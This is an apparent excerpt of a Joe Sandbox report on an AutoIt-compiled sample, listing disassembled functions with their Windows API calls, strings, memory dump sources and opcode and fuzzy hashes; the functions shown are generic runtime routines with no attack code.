                                                                                  • Instruction ID: 4555e1cdba2d37de04514e7eaa6ef537390d6ff8e2d4fbafc0e2ee9356502a35
                                                                                  • Opcode Fuzzy Hash: 409f3a896e5d0f18e3c8216ef2459d1cbb1ca844be719b32ef40f08af3cc2dd5
                                                                                  • Instruction Fuzzy Hash: D7F0C2752096129AFB689B19FC456EAAFD4F754720F10461AF205CA284E730D8C19FA4
                                                                                  Function 004F4024 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadImageW.USER32(004F0000,00000063,00000001,00000010,00000010,00000000), ref: 004F4048
                                                                                  • EnumResourceNamesW.KERNEL32(00000000,0000000E,005367E9,00000063,00000000,75A50280,?,?,004F3EE1,?,?,000000FF), ref: 005641B3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnumImageLoadNamesResource
                                                                                  • String ID: >O
                                                                                  • API String ID: 1578290342-1134023648
                                                                                  • Opcode ID: 1872a223b932691c9de5b8f131c802516f1decf6bfc16339fcbf8a193998f94e
                                                                                  • Instruction ID: 18c0fa40e38b012c2bcf294ee2ed52c535442d968f4fcd079d0b0e767e7a5568
                                                                                  • Opcode Fuzzy Hash: 1872a223b932691c9de5b8f131c802516f1decf6bfc16339fcbf8a193998f94e
                                                                                  • Instruction Fuzzy Hash: C4F062316407187BD2A05B19BC5AF933F6DE765BB5F500206F314971E0D2F0A188AAA8
                                                                                  Function 00537744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassName_wcscmp
                                                                                  • String ID: #32770
                                                                                  • API String ID: 2292705959-463685578
                                                                                  • Opcode ID: 43f4f5042e8464f0069e6ff59bf86141ad4d4bcf7d9d480400abe7171dda3e9a
                                                                                  • Instruction ID: 4471338ef2118f0bfc2f6bdf61fd75ea8686bf691b52e52052c4cce068904452
                                                                                  • Opcode Fuzzy Hash: 43f4f5042e8464f0069e6ff59bf86141ad4d4bcf7d9d480400abe7171dda3e9a
                                                                                  • Instruction Fuzzy Hash: 27E09277A0422927DB20AAA5AC0AECBFFACFBA5764F01015AB905E3041D670A64587E4
                                                                                  Function 0052A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0052A63F
                                                                                    • Part of subcall function 005113F1: _doexit.LIBCMT ref: 005113FB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message_doexit
                                                                                  • String ID: AutoIt$Error allocating memory.
                                                                                  • API String ID: 1993061046-4017498283
                                                                                  • Opcode ID: fa953eb89145a8047c79ac45577d8d1440c280938bc8c4f3d1c0fae8277e9548
                                                                                  • Instruction ID: 30762a3b8be2be76b1f4dd9ec326270e05e94c1b4f98dee8255753a31f65fcec
                                                                                  • Opcode Fuzzy Hash: fa953eb89145a8047c79ac45577d8d1440c280938bc8c4f3d1c0fae8277e9548
                                                                                  • Instruction Fuzzy Hash: C7D0C23128032833D21436983C1BFC96E88AF56F51F040016BB08A54C24AE6968002EA
                                                                                  Function 0056AE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetSystemDirectoryW.KERNEL32(?), ref: 0056ACC0
                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0056AEBD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: DirectoryFreeLibrarySystem
                                                                                  • String ID: WIN_XPe
                                                                                  • API String ID: 510247158-3257408948
                                                                                  • Opcode ID: fd2edb92931bbe7b41a551ef95b0b5198e865280682452046ae2c2f3a01d10ed
                                                                                  • Instruction ID: 9a8466538fe0cf43f3c2d9e5ba17866a9acd5d1409d48e7b48d036f4c189b494
                                                                                  • Opcode Fuzzy Hash: fd2edb92931bbe7b41a551ef95b0b5198e865280682452046ae2c2f3a01d10ed
                                                                                  • Instruction Fuzzy Hash: E1E0C9B0C006499FEB11DBA9D9489ECBBB8BB58301F148585E116B2560DB705E88EF32
                                                                                  Function 005586CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005586E2
                                                                                  • PostMessageW.USER32(00000000), ref: 005586E9
                                                                                    • Part of subcall function 00537A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00537AD0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                  • String ID: Shell_TrayWnd
                                                                                  • API String ID: 529655941-2988720461
                                                                                  • Opcode ID: ece25aa3a23b24029cb86a7f0988afb4b4d6417a9805c25ae776940e92ed1e7f
                                                                                  • Instruction ID: fc8d1aaa7b4dc855bc1977db5dd3ca14671d051cbff20d08e25ef5a5b1fcbe4f
                                                                                  • Opcode Fuzzy Hash: ece25aa3a23b24029cb86a7f0988afb4b4d6417a9805c25ae776940e92ed1e7f
                                                                                  • Instruction Fuzzy Hash: 7BD0C9717853186BE2746770AC0BFCA6B28AB59B21F100815B649AA1D0C9A0A984A664
                                                                                  Function 00558698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005586A2
                                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 005586B5
                                                                                    • Part of subcall function 00537A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00537AD0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                  • String ID: Shell_TrayWnd
                                                                                  • API String ID: 529655941-2988720461
                                                                                  • Opcode ID: ea11dcab26a82ea35349c8f49a208527f1ab48c09ed872b43566cf5842c5f0bd
                                                                                  • Instruction ID: eb3c2b02a4a6ba17e4a974b70202a6fbdd877cb8f888bea390e92d81943d2c3e
                                                                                  • Opcode Fuzzy Hash: ea11dcab26a82ea35349c8f49a208527f1ab48c09ed872b43566cf5842c5f0bd
                                                                                  • Instruction Fuzzy Hash: A2D0C971785318ABE2746770AC0BFCA6F28AF59B21F100815B64DAA1D0C9A0A984A664